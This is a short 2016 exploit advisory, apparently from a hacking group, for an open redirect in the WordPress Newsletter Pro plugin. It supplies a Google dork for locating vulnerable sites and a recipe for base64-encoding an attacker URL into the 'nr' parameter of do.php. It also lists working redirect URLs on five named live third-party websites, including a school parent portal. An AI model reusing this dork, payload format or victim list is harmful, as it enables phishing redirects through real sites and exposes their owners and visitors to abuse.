[^][^][^][^][^][^][^][^][^][^][^] [^] Exploit Title : Wordpress Newsletter Pro Plugin Open Redirect [^] Exploit Author : Ashiyane Digital Security Team [^] Vendor Homepage: http://www.thenewsletterplugin.com/downloads [^] Google Dork : inurl:newsletter-pro/do.php [^] Date : 06 Feb. 2016 [^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel [^] Version : 2.5.3.3 [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Vulnerable PHP File = newsletter-pro/do.php [^] Vulnerable Parameter = nr [^] [^] How To Attack : [^] [^] Attack Like = site.com/wp-content/plugins/newsletter-pro/do.php?a=r&nr=NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ== [^] [^] the nr parameter should be base64 encoded [^] [^] if you decode it you can add your url after Something,Something,Something, And Encode It [^] [^] For Example : NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ== ( Decode is ) : 52;0;http://google.com;http://google.com [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Demos : [^] [^] [^] http://daaam.info/wp-content/plugins/newsletter-pro/do.php?a=r&nr=NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ== [^] [^] http://www.automaticbooks.org/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20= [^] [^] http://autismodiario.org/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20= [^] [^] http://www.bigfatzoproductions.nl/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20= [^] [^] http://inside.isb.ac.th/parentportal/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20= [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Discovered by : Ac!D [^] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for vendetta , Sh.Cloner & Hassan [^][^][^][^][^][^][^][^][^][^][^]